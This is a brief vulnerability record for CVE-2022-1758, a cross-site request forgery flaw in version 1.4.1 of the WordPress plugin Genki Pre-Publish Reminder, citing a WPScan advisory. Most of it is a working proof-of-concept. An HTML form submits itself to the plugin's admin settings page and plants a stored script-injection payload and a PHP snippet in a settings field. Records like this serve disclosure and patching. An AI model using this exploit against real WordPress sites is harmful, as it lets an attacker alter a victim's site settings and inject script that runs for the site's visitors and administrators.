CVE: CVE-2022-1758

Name: Genki Pre-Publish Reminder (genki-pre-publish-reminder)

Version: 1.4.1

Date: 2022-04-19 21:06:09

Advisory: https://wpscan.com/vulnerability/211816ce-d2bc-469b-9a8e-e0c2a5c4461b

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=genki-pre-publish-reminder/genki_pre_publish_reminder.php" method="POST">
    <input type="text" name="location" value="1">
    <input type="text" name="bordercolor" value="#e6db55">
    <input type="text" name="bgcolor" value="#ffffe0">
    <textarea name="list">
<img src=x onerror=alert(1)>
<?php echo "hacked"; ?>
</textarea>
    <input type="text" name="update_message" value="Save Changes">
</form>
<script>
    document.forms[0].submit();
</script>